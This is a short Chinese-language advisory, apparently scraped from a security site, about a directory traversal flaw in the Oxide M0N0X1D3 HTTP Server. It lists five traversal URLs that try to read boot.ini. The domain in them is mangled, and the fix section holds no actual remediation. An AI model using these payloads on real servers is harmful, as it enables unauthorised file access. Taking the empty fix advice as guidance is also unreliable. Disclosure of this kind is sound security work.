标题: Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability
程序: Oxide M0N0X1D3 HTTP Server
影响版本: 20040223
开发者: http://sourceforge.net/projects/oxide-ws/
程序: Medium
问题描述:
Oxide M0N0X1D3 HTTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an HTTP Browser.
示例:
****************************************************************
http://HdhCmsTest2cto测试数据 /..\..\..\boot.ini
http://HdhCmsTest2cto测试数据 /..\\..\\..\\boot.ini
http://HdhCmsTest2cto测试数据 /..\/..\/..\/boot.ini
http://HdhCmsTest2cto测试数据 //..\/..\/..\boot.ini
http://HdhCmsTest2cto测试数据 /.\..\.\..\.\..\boot.ini
..
HdhCmsTest2cto测试数据 修复方案:
你懂得
查看更多关于Oxide M0N0X1D3 HTTP Server目录遍历缺陷及修复 - 网站安的详细内容...